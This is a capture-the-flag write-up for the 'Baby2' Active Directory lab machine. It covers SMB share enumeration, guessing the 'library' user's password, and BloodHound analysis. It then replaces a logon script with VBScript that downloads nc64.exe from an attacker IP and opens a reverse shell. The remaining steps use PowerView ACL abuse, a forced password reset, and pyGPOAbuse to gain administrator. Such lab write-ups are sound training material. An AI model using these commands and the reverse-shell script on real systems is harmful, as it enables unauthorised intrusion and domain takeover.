Baby2, a medium rated machine involved enumerating smb shares to find a logon script, having the credentials, this script can be modified to get a shell as Amelia , who belongs to a group that had WriteDACL on Gpoadm , granting full control over gpoadm and changing the account’s password, having GenericAll on GPO, through pyGPOAbuse creating a scheduled task to get administrator.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-08 10:27:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open tcpwrapped
389/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Issuer: commonName=baby2-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T17:39:15
| Not valid after: 2024-08-21T17:39:15
| MD5: 86833092b739d099392a9fba548ca41d
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
445/tcp open tcpwrapped
3269/tcp open tcpwrapped
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.baby2.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.baby2.vl
| Issuer: commonName=baby2-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-08-22T17:39:15
| Not valid after: 2024-08-21T17:39:15
| MD5: 86833092b739d099392a9fba548ca41d
|_SHA-1: 595b9978c2e36c712b4875ff45b40efc72657d3f
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=dc.baby2.vlEnumerating smb shares with null authentication
From homes share, we can find some directories for users
Also from apps share there's login.vbs.lnk
With kerbrute we can verify these users also check if pre-authentication is disabled for AS-REP roasting
From NETLOGON there’s the login.vbs
Foothold (Amelia)
From the users, there’s library which seems odd, on trying to login with the password library it shows that's a valid login
This user has READ access on SYSVOL share
Also running bloodhound to enumerate domain
python3 /opt/BloodHound.py/bloodhound.py -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.105.23This user didn’t had any ACLs but running the shortest path to high value targets , members of LEGACY group have WriteDacl on GPOADM which further has GenericAll on Group Policy Object (GPO)
But for now we need to focus on logon script, even tho from the output of crackmapexec, it showed that we only have READ access on SYSVOL but we can still overwrite the login.vbs file from scripts folder
Have responder or smbserver ready and upload the file
On responder, we’ll receive the NTLMv1 hash of Amelia
But I wasn’t able to crack this hash, instead we can just modify the vbs script to get a reverse shell
Set oShell = CreateObject("Wscript.Shell")
oShell.run "cmd.exe /c curl 10.8.0.136/nc64.exe -o C:\Windows\Temp\nc64.exe"
oShell.run "cmd.exe /c C:\Windows\Temp\nc64.exe 10.8.0.136 2222 -e cmd.exe"Check in which groups Amelia belongs to
Abusing GPO to gain administrator
This account is a member of legacy group, meaning that we can abuse WriteDACL on gpoadm, with PowerView granting GenericAll on GPOADM
Add-DomainObjectAcl -Rights 'All' -TargetIdentity "GPOADM" -PrincipalIdentity "Amelia.Griffiths" -VerboseNow we can change the password for gpoadm
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity GPOADM -AccountPassword $UserPasswordUsing pyGPOAbuse, we can create an immediate scheduled task which will get executed as SYSTEM user to add gpoadm in local administrators group (for this I had to use python virtual environment as some dependencies were causing an issue with the current version of impacket), we’ll need the GPO ID for creating the task
python3 pygpoabuse.py baby2.vl/GPOADM:'Password123!' -gpo-id "31B2F340-016D-11D2-945F-00C04FB984F9" -command 'net localgroup administrators GPOADM /add' -fWait for few seconds for the created task to be executed, we’ll see gpoadm being a part of administrators group
Now we can login through WinRM
